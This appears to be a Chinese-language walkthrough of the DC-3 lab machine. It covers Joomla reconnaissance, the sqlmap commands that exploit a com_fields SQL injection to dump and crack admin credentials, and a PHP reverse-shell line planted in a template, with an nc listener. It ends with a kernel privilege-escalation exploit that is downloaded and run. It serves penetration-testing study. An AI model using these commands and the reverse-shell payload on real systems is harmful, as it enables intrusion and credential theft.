准备kali(192.168.61.132)和DC-3(未知)
kali与DC-3都使用NAT连接
DC-3靶机 下载地址:
链接:https://pan.baidu.com/s/1LAjfwFfYYuvcJERaSh7MQw?pwd=ew4x
提取码:ew4x
第一步使用nmap扫描同段主机,判断DC-3的IP地址
发现主机192.168.61.135,用网页访问,并查看框架发现是Joomla系列
我们可以使用joomscan扫描工具
Joomla!网站扫描工具joomscan
Joomla!是一款知名的PHP语言编写的CMS系统。很多网站都使用Joomla!搭建而成。Kali Linux集成了一款Joomla!网站扫描工具joomscan。该工具不仅可以对网站所使用的Joomla!版本、防火墙进行探测,还可以探测已知的漏洞,并生成文本或网页形式的报告。在使用之前,用户应该先使用自带的check和update命令升级该工具,以获取最新的扫描工具和漏洞数据库。
下载joomscan命令
apt install joomscan
下载完成后打开joomscan扫描工具,然后进行对网站的扫描
joomscan -u http://192.168.61.135
我们可以看到DC3的joomla的版本号以及管理员地址
用浏览器进入到管理员地址,再使用以下命令对joomla版本的扫描
searchsploit joomla 3.7.0
发现了一个SQL注入漏洞
然后使用命令查看文本的路径
searchsploit -p 42033
扫描出文本路径为
/usr/share/exploitdb/exploits/php/webapps/42033.txt
打开这个文件查看,可以看到一些漏洞的信息,测试过的环境,以及漏洞的地址
http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
最重要的还有一个sqlmap的利用的一个命令
sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
接着直接使用sqlmap的地址将localhost改为DC-3 的地址直接回车即可
扫描出数据库
我们直接使用joomladb的数据库,扫描出joomladb数据库的表
sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
扫描出有个__users的表名
接着扫描__users表中的字段
sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns
选择线程数 1 就可以
检索出了username和 password
接着直接爆破他的账号密码
sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username.password -dump
最后账号密码被爆破出来,但是密码被加密过了,需要自己破解
我们先将爆破出来的密码复制,新建一个文档写入,然后使用john命令进行破解
john 11.txt -show(新建的文件名)
爆破出来密码为 snoopy
我们使用dirsearch命令扫描
dirsearch -u http://192.168.61.135/ -e * -i 200
dirsearch是一个基于python的命令行工具,旨在暴力扫描页面结构,包括网页中的目录和文件。
可以看到有一个README.txt的文本和后台管理员的一个地址
然后我们先进行后台管理员登录
登录之后先拿到操作权限,提权,寻找可以上传后门木马的地方,写入一句话木马,最终选择创建一个新的shell.php文件 并写入一句话,保存
在管理员登录页面,点击Templates -- Templates
根据页面提示进入,然后选择index.php,在文件上方插入exec反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.61.132/1234 0>&1'"); ?>
这里的IP地址是kali的IP地址
与此同时在kali中进行nc监听1234端口
nc -lvvp 1234
监听完然后保存exec木马,在左上方出现 Editing file "/index.php" in template "beez3".的路径
我们访问这个路径 即:192.168.61.135/templates/beez3/index.php 这个页面一直再转圈圈出不来
然后kali就会反弹shell成功
使用 uname -a查看当前靶机的内核版本
然后使用kali的searchspolit查找Ubuntu 16.04的内核提权漏洞
searchsploit Ubuntu 16.04 | grep 'Privilege Escalation'
或者
searchsploit Linux kernel 4.4x | grep 'Privilege Escalation'
Privilege Escalation:提升权限
使用searchsploit -m 命令将 39772这个文件复制到当前路径
查看39772的文件发现底部有一个github网址下载链接,将这个压缩包下载
因为这个是外网的文件,我们在windows系统下载,使用phpstudy将文件放到kali
将下载好的文件放到phpstudy的www的目录下
使用wget命令将这个文件下载到kali中
wget http://192.168.43.117:80/39772.zip
IP地址为物理机的IP地址,端口号为phpstudy开启的端口号
然后使用解压 unzip命令,将文件解压
unzip 39772.zip
解压完之后进入到这个目录,发现两个压缩包,使用tar解压 exploit压缩包
解压完,查看发现多了一个目录:ebpf_mapfd_doubleput_exploit,进入这个目录查看
进入之后查看有三个文件
然后编译:./compile.sh
运行:./doubleput
之后我们就进入了root权限,cd /root查看,拿到最终的权限
DC-3靶机完结!撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★*.